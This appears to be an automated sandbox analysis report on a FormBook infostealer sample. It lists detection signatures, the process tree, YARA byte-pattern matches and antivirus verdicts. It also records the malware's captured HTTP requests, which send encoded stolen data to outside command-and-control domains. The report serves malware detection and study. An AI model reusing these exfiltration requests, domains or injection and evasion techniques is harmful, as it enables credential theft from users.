Loading ...

Play interactive tourEdit tour

Analysis Report sample.exe

Overview

General Information

Sample Name:sample.exe
Analysis ID:285284
MD5:fa2b81bb3c092af37132e48f36fa92c3
SHA1:715b71b3e7393c7bd1aa50a824e32b6408b6cbae
SHA256:4f90d42980450652ef19fe55ebea9e68683b4d29027900dcbeb5c26d298318fc

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • sample.exe (PID: 6752 cmdline: 'C:\Users\user\Desktop\sample.exe' MD5: FA2B81BB3C092AF37132E48F36FA92C3)
    • sample.exe (PID: 6792 cmdline: C:\Users\user\Desktop\sample.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 3600 cmdline: /c del 'C:\Users\user\Desktop\sample.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • user8pl8ft.exe (PID: 1016 cmdline: C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
          • user8pl8ft.exe (PID: 6588 cmdline: C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
        • user8pl8ft.exe (PID: 1548 cmdline: 'C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe' MD5: FA2B81BB3C092AF37132E48F36FA92C3)
          • user8pl8ft.exe (PID: 5544 cmdline: C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
          • user8pl8ft.exe (PID: 5572 cmdline: C:\Program Files (x86)\Gjz1pufwh\user8pl8ft.exe MD5: FA2B81BB3C092AF37132E48F36FA92C3)
        • ipconfig.exe (PID: 5376 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
        • autochk.exe (PID: 5632 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • colorcpl.exe (PID: 5576 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18349:$sqlite3step: 68 34 1C 7B E1
    • 0x1845c:$sqlite3step: 68 34 1C 7B E1
    • 0x18378:$sqlite3text: 68 38 2A 90 C5
    • 0x1849d:$sqlite3text: 68 38 2A 90 C5
    • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
    0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x177d18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x177f82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x183ab5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1835a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x183bb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x183d2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x17899a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x18281c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x179693:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1896a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x18a6aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 61 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.sample.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.sample.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.sample.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17549:$sqlite3step: 68 34 1C 7B E1
        • 0x1765c:$sqlite3step: 68 34 1C 7B E1
        • 0x17578:$sqlite3text: 68 38 2A 90 C5
        • 0x1769d:$sqlite3text: 68 38 2A 90 C5
        • 0x1758b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x176b3:$sqlite3blob: 68 53 D8 7F 8C
        28.2.user8pl8ft.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          28.2.user8pl8ft.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: sample.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Gjz1pufwh\user8pl8ft.exeAvira: detection malicious, Label: TR/AD.Swotter.sxyui
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Gjz1pufwh\user8pl8ft.exeVirustotal: Detection: 35%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Gjz1pufwh\user8pl8ft.exeReversingLabs: Detection: 16%
          Multi AV Scanner detection for submitted fileShow sources
          Source: sample.exeReversingLabs: Detection: 16%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001C.00000002.563585600.0000000001CE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.565851444.0000000003B8A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.625534463.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.571218555.0000000001970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.564732241.0000000003A85000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.392011804.00000000012E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.391924583.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.561282015.0000000001970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.558411329.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.550726466.00000000042F5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.560919847.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.568017241.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.570354092.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.571182015.0000000001940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362545520.0000000003C5A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.624361067.0000000000D40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362367375.0000000003AD9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.551244965.00000000043FA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.391628167.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.sample.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.user8pl8ft.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 31.2.user8pl8ft.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.sample.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Gjz1pufwh\user8pl8ft.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: sample.exeJoe Sandbox ML: detected
          Source: 1.2.sample.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 28.2.user8pl8ft.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 31.2.user8pl8ft.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\sample.exeCode function: 4x nop then pop edi1_2_00416BE2
          Source: C:\Users\user\Desktop\sample.exeCode function: 4x nop then pop edi1_2_0040E42E
          Source: C:\Users\user\Desktop\sample.exeCode function: 4x nop then pop edi1_2_00416C36
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi3_2_02FE6C51
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi3_2_02FDE42E
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.broadcastsfromthebrainradio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.broadcastsfromthebrainradio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=sxsN1nJkucau2pxuJEzF+Ou0Y2fZMywFtQwHpaGWE6wL4+YSQccjq2y4HrbzwsseprRV&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.broadcastsfromthebrainradio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=gJ1Bg3cRUnF3Tz72382304/qkwZXcYyoTiB0AKQqMrhmjr9Py6IZndCYQUtN235WiBmz&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.theplayhousecafe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kbr/?IDKDM4yx=YUpLZ7qRZuPzGYNdcL/xU2BlEd7IXc2AXan4cBVO0XX3iA8cEVVOkbsZmghrOj5uDZzx&CXO03=fTjPtjUxadQPaH HTTP/1.1Host: www.cape-winelands.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: Joe Sandbox ViewASN Name: xneeloZA xneeloZA
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
          Source: global trafficHTTP traffic detected: POST /kbr/ HTTP/1.1Host: www.theplayhousecafe.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.theplayhousecafe.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.theplayhousecafe.com/kbr/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 44 4b 44 4d 34 79 78 3d 6f 72 35 37 7e 54 52 72 4b 58 56 4a 50 44 47 63 75 35 50 58 6a 4e 50 56 69 44 68 65 61 4a 58 71 57 6d 49 44 47 64 4d 70 4c 72 56 63 6a 76 70 45 28 4a 56 38 6c 36 28 6d 48 32 39 44 70 44 5a 68 36 41 54 66 78 4b 4c 45 43 66 6b 43 41 43 30 5f 46 34 66 42 75 4b 46 30 41 59 46 62 50 73 7e 74 64 6c 28 6c 6b 4e 36 77 6b 46 35 51 73 7a 4c 2d 68 31 35 50 6c 79 39 30 4b 4f 55 65 35 6a 28 63 65 4b 75 39 36 74 35 4b 39 7a 33 73 71 62 43 32 48 56 69 6b 62 50 50 32 54 79 52 55 41 76 6e 4b 36 54 32 74 6d 59 68 69 61 42 30 30 50 59 56 39 5a 58 31 4e 6b 56 74 43 42 72 4d 2d 34 31 74 5a 31 31 44 58 50 64 7e 57 58 5f 45 36 62 42 52 59 76 39 34 55 52 55 30 75 50 76 66 4d 50 4d 45 48 59 45 72 49 39 34 66 6b 31 67 30 57 59 41 58 37 46 31 51 55 4b 30 44 62 39 6f 31 49 75 62 66 63 44 76 74 58 36 57 53 48 79 66 4c 44 28 34 37 7a 70 52 6a 30 46 49 71 5a 4e 30 28 72 36 69 74 7a 61 46 4c 41 51 72 64 32 37 58 44 43 74 53 46 77 4f 4c 49 76 53 74 47 35 4d 36 4a 37 55 6b 47 6e 73 6d 64 59 6f 47 64 33 78 73 67 6a 5a 48 75 63 61 54 4a 52 36 4d 62 42 75 76 65 6a 4a 35 64 72 45 6f 70 32 65 39 4d 53 75 52 61 78 70 6d 69 7a 56 30 6f 75 67 4a 28 41 57 63 76 56 44 52 38 58 64 4e 7a 75 70 4d 33 38 7e 65 41 70 6c 4c 39 48 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: IDKDM4yx=or57~TRrKXVJPDGcu5PXjNPViDheaJXqWmIDGdMpLrVcjvpE(JV8l6(mH29DpDZh6ATfxKLECfkCAC0_F4fBuKF0AYFbPs~tdl(lkN6wkF5QszL-h15Ply90KOUe5j(ceKu96t5K9z3sqbC2HVikbPP2TyRUAvnK6T2tmYhiaB00PYV9ZX1NkVtCBrM-41tZ11DXPd~WX_E6bBRYv94URU0uPvfMPMEHYErI94fk1g0WYAX7F1QUK0Db9o1IubfcDvtX6WSHyfLD(47zpRj0FIqZN0(r6itzaFLAQrd27XDCtSFwOLIvStG5M6J7UkGnsmdYoGd3xsgjZHucaTJR6MbBuvejJ5drEop2e9MSuRaxpmizV0ougJ(AWcvVDR8XdNzupM38~eAplL9HYw).
          Source: global trafficHTTP traffic detected: POST /kbr/ HTTP/1.1Host: www.theplayhousecafe.comConnection: closeContent-Length: 165402Cache-Control: no-cacheOrigin: http://www.theplayhousecafe.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.theplayhousecafe.com/kbr/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 44 4b 44 4d 34 79 78 3d 6f 72 35 37 7e 53 6f 59 49 48 52 59 4c 78 53 64 75 70 66 66 30 65 48 48 7a 56 6f 41 61 61 47 5a 4a 6b 63 54 47 64 63 74 44 4f 78 43 79 66 35 45 32 72 39 37 6f 36 28 6c 50 57 39 41 36 54 64 5a 67 53 54 58 78 4b 69 66 43 66 73 44 53 42 73 2d 45 6f 65 4a 76 71 4a 45 47 59 42 51 50 74 4f 59 61 41 50 74 68 4e 32 77 35 6c 42 6f 69 79 62 6c 6d 78 52 2d 28 6a 46 78 49 4c 6f 48 35 77 36 72 52 4a 53 44 79 50 64 49 73 79 44 32 76 59 61 65 55 32 53 5f 56 37 69 77 63 52 73 51 64 65 37 4f 37 53 33 51 70 35 68 68 45 6c 51 79 5a 4b 4e 31 63 6c 5a 77 69 45 63 37 42 6f 63 75 79 6e 70 45 69 6a 48 66 63 63 79 77 51 2d 51 34 48 67 52 41 72 37 6c 73 57 6b 45 52 44 4b 6a 63 49 66 42 46 4d 68 76 59 69 70 48 66 33 31 63 61 4d 69 66 70 47 6d 38 4d 43 55 54 30 33 4f 52 54 68 62 7e 52 45 74 67 2d 30 57 53 73 68 76 4c 31 77 59 62 48 73 6c 7a 46 50 34 61 37 44 55 47 79 70 69 4a 32 58 6a 58 63 65 71 31 61 39 32 62 30 34 79 56 49 4b 72 39 69 52 5f 61 43 47 61 49 71 65 43 36 73 73 6d 64 75 6f 48 64 5a 67 4f 63 6a 62 56 6d 4c 63 30 56 56 79 73 62 4d 6f 5f 75 68 48 75 31 43 45 73 46 32 66 4e 64 39 76 69 36 78 6a 56 36 77 52 68 55 75 6d 35 28 41 62 38 75 52 45 55 64 72 65 38 6e 74 73 4e 54 6a 38 34 39 47 70 70 51 71 49 4e 43 6f 6e 71 65 35 51 57 67 45 54 31 45 70 5a 70 58 49 62 5f 4b 73 34 61 43 6b 31 78 37 71 78 6c 31 54 39 63 44 33 6b 5a 68 58 76 6a 56 4c 36 4d 6e 67 38 45 74 32 30 6c 65 41 69 62 71 32 62 38 6e 4f 39 69 75 61 37 78 6d 68 48 33 61 33 6f 52 37 31 77 77 7a 51 5a 67 36 32 7e 33 78 67 70 4c 43 42 70 69 4d 30 5a 57 39 5f 58 69 7e 63 55 78 65 5f 56 4c 6c 61 6e 35 49 33 30 72 58 2d 49 74 6b 4d 77 63 68 49 46 69 4d 36 78 46 42 49 33 64 7a 74 49 62 77 54 62 66 4d 31 4f 59 6a 30 55 67 72 71 68 66 59 43 57 49 48 6e 64 53 49 57 70 71 77 30 79 6b 4b 5f 54 35 63 4e 76 79 50 53 64 6b 42 79 4e 6c 6f 6a 38 68 69 75 6a 7a 6c 41 41 52 32 43 68 72 57 54 48 70 41 6f 78 78 33 51 59 50 36 53 28 58 6b 49 6f 52 76 51 79 76 7e 71 68 34 47 4c 61 38 57 35 4c 33 74 67 69 45 6f 70 70 33 58 68 31 68 44 55 4a 33 4e 6d 37 36 75 51 37 35 6c 65 71 76 6c 63 67 38 56 67 38 39 76 55 4c 37 30 45 4f 47 4a 42 57 37 38 55 30 6a 39 6c 72 6d 7e 6c 54 35 39 52 51 43 6d 6e 66 47 62 67 4c 30 79 55 28 5f 73 4b 59 6c 28 52 5a 35 6c 54 38 4a 49 76 70 59 34 4f 58 67 76 52 63 70 68 35 79 51 6d 56 49 45 35 33 48 53 44 70 47 70 46 39 52 30 43 63 28 70 32 54 6e 6c 37 48 54 36 6d 6f 6e 6e 4a 68 71 45 67 72 49 44 57 41 64 55 74 30 6c 47 49 51 70 39 72 36 58 44 30 5f 79 4c 6d 52 36 66 49 73 6f 55 54 56 36 36 37 35 49 30 35 78 4f 6e 67 36 35 73 41 39 64 65 6f 4a 50 38 50 76 4f 6
          Source: global trafficHTTP traffic detected: POST /kbr/ HTTP/1.1Host: www.cape-winelands.infoConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.cape-winelands.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cape-winelands.info/kbr/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 44 4b 44 4d 34 79 78 3d 51 32 6c 78 48 63 75 31 51 76 48 38 5a 75 34 33 4a 66 71 58 43 42 46 35 48 4e 76 69 61 38 7e 4a 4a 50 48 38 4b 51 64 73 34 54 33 49 6a 46 55 50 4b 6b 41 48 68 39 68 75 7e 51 35 62 50 67 4d 48 4f 37 4b 65 59 5a 32 6f 4a 38 4b 71 4f 46 33 2d 72 36 41 4a 51 30 6c 36 65 62 58 7a 74 4a 32 4b 69 4e 31 35 44 66 39 4e 4d 74 47 75 7e 78 72 73 59 74 55 54 39 34 37 49 56 63 69 78 33 4d 70 47 41 33 59 61 7a 63 4c 79 33 64 49 62 58 59 4e 63 49 57 47 70 50 74 6f 64 6f 71 31 78 28 54 62 73 34 75 28 62 67 65 4e 48 6f 4c 49 6f 32 48 65 59 65 6f 7e 57 58 76 33 77 6a 76 65 65 57 45 28 6f 54 2d 72 35 65 44 32 48 65 2d 53 70 46 4a 32 76 76 56 6d 66 53 48 67 38 41 77 30 67 77 73 45 33 6c 4b 5a 53 41 4f 47 35 61 78 4e 4a 28 44 36 68 35 30 59 75 43 48 36 36 71 59 6c 6b 6d 53 44 77 31 48 73 49 4b 4e 4e 7a 78 4c 5a 65 61 71 58 53 69 48 6c 41 53 49 39 41 46 35 7a 47 48 50 33 63 33 71 76 52 32 63 43 74 4d 6d 55 31 43 37 62 4e 75 70 28 55 63 62 52 54 6c 74 6b 76 78 34 71 4b 4a 67 66 75 47 32 37 6a 51 55 55 2d 46 74 74 51 62 67 77 48 39 6f 67 58 55 53 47 77 79 4f 59 6c 66 32 43 7a 35 69 36 38 54 5a 4e 51 77 74 75 4e 47 43 6c 46 7a 46 7e 35 28 4e 6d 53 68 63 4e 2d 6d 71 74 58 52 30 52 2d 75 4b 68 68 4e 50 6e 41 48 67 29 2e 00 29 2e 00 00 00 00 00 Data Ascii: IDKDM4yx=Q2lxHcu1QvH8Zu43JfqXCBF5HNvia8~JJPH8KQds4T3IjFUPKkAHh9hu~Q5bPgMHO7KeYZ2oJ8KqOF3-r6AJQ0l6ebXztJ2KiN15Df9NMtGu~xrsYtUT947IVcix3MpGA3YazcLy3dIbXYNcIWGpPtodoq1x(Tbs4u(bgeNHoLIo2HeYeo~WXv3wjveeWE(oT-r5eD2He-SpFJ2vvVmfSHg8Aw0gwsE3lKZSAOG5axNJ(D6h50YuCH66qYlkmSDw1HsIKNNzxLZeaqXSiHlASI9AF5zGHP3c3qvR2cCtMmU1C7bNup(UcbRTltkvx4qKJgfuG27jQUU-FttQbgwH9ogXUSGwyOYlf2Cz5i68TZNQwtuNGClFzF~5(NmShcN-mqtXR0R-uKhhNPnAHg).).
          Source: global trafficHTTP traffic detected: POST /kbr/ HTTP/1.1Host: www.cape-winelands.infoConnection: closeContent-Length: 165402Cache-Control: no-cacheOrigin: http://www.cape-winelands.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cape-winelands.info/kbr/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 44 4b 44 4d 34 79 78 3d 51 32 6c 78 48 64 6d 48 56 65 7a 58 53 36 4d 32 47 76 36 50 47 42 31 72 4e 74 54 50 65 75 75 37 45 5f 71 6e 4b 54 46 77 31 32 48 67 70 77 63 50 42 48 6f 41 6f 39 68 70 34 51 35 55 4c 67 52 79 42 38 57 57 59 62 61 47 4a 38 53 72 56 57 28 37 72 71 41 53 51 55 6f 4a 59 66 28 73 74 4b 43 5f 69 75 5a 78 47 66 78 4e 43 39 75 57 79 77 37 7a 62 76 67 57 33 70 58 4a 58 5a 65 30 33 65 64 79 48 6b 6c 35 6c 70 76 4b 7a 75 55 6d 53 59 64 77 45 68 36 69 46 63 4e 56 6e 4a 4a 45 31 51 50 67 28 73 62 69 73 5f 4e 59 33 72 41 75 39 67 36 51 62 5a 71 6a 53 5f 71 42 6a 76 6d 6f 62 53 28 39 5a 59 76 78 53 51 69 74 56 71 43 52 64 61 65 65 72 57 66 6c 51 47 51 54 66 6c 4a 69 31 38 34 75 6b 4d 64 43 4e 50 43 72 59 46 6c 56 6e 44 72 49 35 6c 63 32 50 6e 71 46 6b 5f 59 38 7a 54 6a 34 32 46 41 75 55 64 4e 49 39 72 5a 53 53 38 58 36 6b 7a 56 58 57 59 4e 39 45 36 53 48 44 63 7a 52 79 6f 58 33 72 75 79 77 4f 7a 34 70 4d 6f 69 36 34 35 36 57 66 4a 4d 74 32 4e 6b 7a 37 61 79 4e 4a 67 66 49 47 79 76 4e 52 67 63 2d 46 5f 30 4f 61 42 77 4c 32 49 67 77 59 69 32 79 37 64 4d 31 66 31 79 7a 28 48 47 47 63 4c 74 51 36 63 65 43 47 6e 4a 46 7a 31 7e 35 30 74 6e 53 6c 4a 73 35 6e 35 30 6a 59 58 42 70 70 75 77 72 4f 64 75 5a 5a 4e 63 32 56 66 32 70 37 42 54 63 46 73 39 6a 50 48 61 7a 70 59 6c 43 45 43 51 39 4c 61 32 31 63 70 34 6f 42 34 76 31 69 6f 74 65 5a 71 4a 48 73 63 54 44 69 34 57 70 47 33 48 74 28 58 44 6a 6c 76 6a 45 68 75 5a 64 30 76 63 65 68 5a 6a 4a 73 6a 6d 62 31 6b 51 61 4e 75 57 4b 75 43 71 32 44 2d 38 45 44 41 71 38 37 